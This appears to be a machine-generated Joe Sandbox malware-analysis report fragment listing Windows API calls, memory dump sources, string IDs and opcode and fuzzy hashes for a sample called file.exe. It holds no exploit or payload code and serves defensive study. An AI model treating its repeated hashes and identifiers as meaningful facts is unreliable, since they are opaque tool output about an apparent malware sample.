                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 1096550386-246349140
                                                                                                                                                                    • Opcode ID: 9b5937f633efa17beaccccaf780fb8d91388674ee8ceeb55eac01adb4b7cea94
                                                                                                                                                                    • Instruction ID: 2e3ecc3b7ab76f4ba10c6e3983edfb6ab3673a98f7a9f443c7a37eb360e76e40
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b5937f633efa17beaccccaf780fb8d91388674ee8ceeb55eac01adb4b7cea94
                                                                                                                                                                    • Instruction Fuzzy Hash: 82519172608307AFEB158FE98C94EEB3AADEF46714B110D29FD14D71A0EBB0DC509660

                                                                                                                                                                    APIs
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,6E81354E,00000000,6E811048,00000000,00000000,00000001,?,6E8136C7,00000022,FlsSetValue,6E81B390,6E81B398,00000000), ref: 6E813500
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                    • Opcode ID: 1f6ae62fa8f60c9fdd639a56cd06728f29a9f635410f73b9536d574ef9971366
                                                                                                                                                                    • Instruction ID: 90c23a52329c7844c2e783c323cec37ef1b9661578d0ab45d3f7b8621b5b042c
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f6ae62fa8f60c9fdd639a56cd06728f29a9f635410f73b9536d574ef9971366
                                                                                                                                                                    • Instruction Fuzzy Hash: 3821AB31A0C517ABDB229BE9DD55BCA3768DB537B0B120964ED19A72C4D730ED04C6E0

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,48EB6D7D,00000000,?,00000000,6E818DC2,000000FF,?,6E81090F,?,?,6E8108E3,?), ref: 6E8109AA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E8109BC
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,6E818DC2,000000FF,?,6E81090F,?,?,6E8108E3,?), ref: 6E8109DE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll$}mH
                                                                                                                                                                    • API String ID: 4061214504-503396529
                                                                                                                                                                    • Opcode ID: 6640ff4253f9442deda50d168dc6dce7b4f0fbee6ee0737380d2c12f030bc7a8
                                                                                                                                                                    • Instruction ID: 2c40519949665153179a78f8758b87ce593c48149704a6698d9decb50a7cacfb
                                                                                                                                                                    • Opcode Fuzzy Hash: 6640ff4253f9442deda50d168dc6dce7b4f0fbee6ee0737380d2c12f030bc7a8
                                                                                                                                                                    • Instruction Fuzzy Hash: 7401673190491BEFDF018B94CC19BEE77B9FB05754F000929E826A2790EB749904CB90

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(48EB6D7D,00000000,00000000,?), ref: 6E815964
                                                                                                                                                                      • Part of subcall function 6E813241: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E81539F,?,00000000,-00000008), ref: 6E8132A2
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E815BB6
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E815BFC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E815C9F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 2112829910-246349140
                                                                                                                                                                    • Opcode ID: c16d31dc69007e7e78b463baa465789ed32d2f5e1e1b460f3a244eeb692af794
                                                                                                                                                                    • Instruction ID: 25b193564df1a1e32c8f0ab301baa6c2f9a528e86e37856aa5175845cb7104a0
                                                                                                                                                                    • Opcode Fuzzy Hash: c16d31dc69007e7e78b463baa465789ed32d2f5e1e1b460f3a244eeb692af794
                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED15D75D0864A9FDB01CFE8C8809DDBBB5FF49314F14496AE866EB291E730A941CF50
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(00000001,?,6E80E6F1,6E80BFC8,6E80B98F,?,6E80BBC7,?,00000001,?,?,00000001,?,6E81EDC8,0000000C,6E80BCC0), ref: 6E80EACA
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E80EAD8
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E80EAF1
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E80BBC7,?,00000001,?,?,00000001,?,6E81EDC8,0000000C,6E80BCC0,?,00000001,?), ref: 6E80EB43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    • Opcode ID: c454809706add6be714ec56f66e672c979ceeeda1a3fbfcb6438c2a78fbba790
                                                                                                                                                                    • Instruction ID: 662b9042afe205d10cfd38c3660d6131400943cb79ad9eff9510559d7efc0ecf
                                                                                                                                                                    • Opcode Fuzzy Hash: c454809706add6be714ec56f66e672c979ceeeda1a3fbfcb6438c2a78fbba790
                                                                                                                                                                    • Instruction Fuzzy Hash: 4801B13211EB125EFF5516FDAC95A9B2759EB077B87304F2AF529640D0FF1148419384
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Users\user\Desktop\file.exe, xrefs: 6E81268F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                                                    • API String ID: 0-3695852857
                                                                                                                                                                    • Opcode ID: b5debffc06293f2b65fd3a1a529a06d8ed4ba336be67cfa4e052a0cc3441f666
                                                                                                                                                                    • Instruction ID: 0f7b5f54d23384bbc4479c4b7ef6528f99d203e3d134bb76d02f8900942f8ad3
                                                                                                                                                                    • Opcode Fuzzy Hash: b5debffc06293f2b65fd3a1a529a06d8ed4ba336be67cfa4e052a0cc3441f666
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B21847161C317AF9B519FF99C80ADB77BDAF063687108D18E91897190EB34EC609790
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E80E54F
                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E80E603
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                    • String ID: csm$}mH
                                                                                                                                                                    • API String ID: 3480331319-3967853463
                                                                                                                                                                    • Opcode ID: 1e586b2743d7d848bb707081d40cf0233c9a2a041ac6b0132daf39181689f1d6
                                                                                                                                                                    • Instruction ID: 5506d1bc9729e03cece171d6d363daf49936b5051e2514e0a8e9d5e4e83ddf84
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e586b2743d7d848bb707081d40cf0233c9a2a041ac6b0132daf39181689f1d6
                                                                                                                                                                    • Instruction Fuzzy Hash: F9416D34A006199BCF10CFE8CC94ADFBBA5AF45328F108D55E8299B391E735AA15CB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 6E814A9F
                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,-00000008,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,FFFFF9B5), ref: 6E814AF7
                                                                                                                                                                    • __freea.LIBCMT ref: 6E814B04
                                                                                                                                                                      • Part of subcall function 6E811BE2: HeapAlloc.KERNEL32(00000000,6E812BEC,?,?,6E812BEC,00000220,?,00000000,?), ref: 6E811C14
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 324646697-246349140
                                                                                                                                                                    • Opcode ID: 8421e7450f15bcf3f2a6765847c9b1f7a281a3306a16122779ee08143433af12
                                                                                                                                                                    • Instruction ID: 630b8bca7cd522c9313859b9fba927a0b5902b86c3798c7fdcd5d9d56ce7ac61
                                                                                                                                                                    • Opcode Fuzzy Hash: 8421e7450f15bcf3f2a6765847c9b1f7a281a3306a16122779ee08143433af12
                                                                                                                                                                    • Instruction Fuzzy Hash: EE31AF7290521BABDB118FE9CC44EEF3BB9EF84319F010928E814E7191E7348952C7A0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6E812795
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E81279F
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E8127A6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastModuleName__dosmaperr
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 4076908705-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E80F045,00000000,?,00000001,?,?,?,6E80F134,00000001,FlsFree,6E81A5C8,FlsFree), ref: 6E80F0A1
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E80F045,00000000,?,00000001,?,?,?,6E80F134,00000001,FlsFree,6E81A5C8,FlsFree,00000000,?,6E80EB91), ref: 6E80F0AB
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E80F0D3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6E813241: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E81539F,?,00000000,-00000008), ref: 6E8132A2
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E811EF1
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E811EF8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 6E811F32
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E811F39
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 6E8132EC
                                                                                                                                                                      • Part of subcall function 6E813241: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E81539F,?,00000000,-00000008), ref: 6E8132A2
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E813324
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E813344
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000), ref: 6E81701D
                                                                                                                                                                    • GetLastError.KERNEL32(?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000,?,?,?,6E816296,00000000), ref: 6E817029
                                                                                                                                                                      • Part of subcall function 6E816FEF: CloseHandle.KERNEL32(FFFFFFFE,6E817039,?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000,?,?), ref: 6E816FFF
                                                                                                                                                                    • ___initconout.LIBCMT ref: 6E817039
                                                                                                                                                                      • Part of subcall function 6E816FB1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E816FE0,6E8167B2,?,?,6E815CF3,?,00000000,00000000,?), ref: 6E816FC4
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E8167C5,00000000,00000001,00000000,?,?,6E815CF3,?,00000000,00000000,?), ref: 6E81704E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 6E81291F: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 6E81294A
                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,6E812C2F,?,00000000,?,00000000,?), ref: 6E812E49
                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E812C2F,?,00000000,?,00000000,?), ref: 6E812E85
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 546120528-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 6E804E72
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                    • API String ID: 909987262-2556327735
                                                                                                                                                                    APIs
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 6E80F836
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,6E81630B,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?), ref: 6E81605A
                                                                                                                                                                    • GetLastError.KERNEL32(6E81630B,00000000,6E813F27,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6E814094,?), ref: 6E81608A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
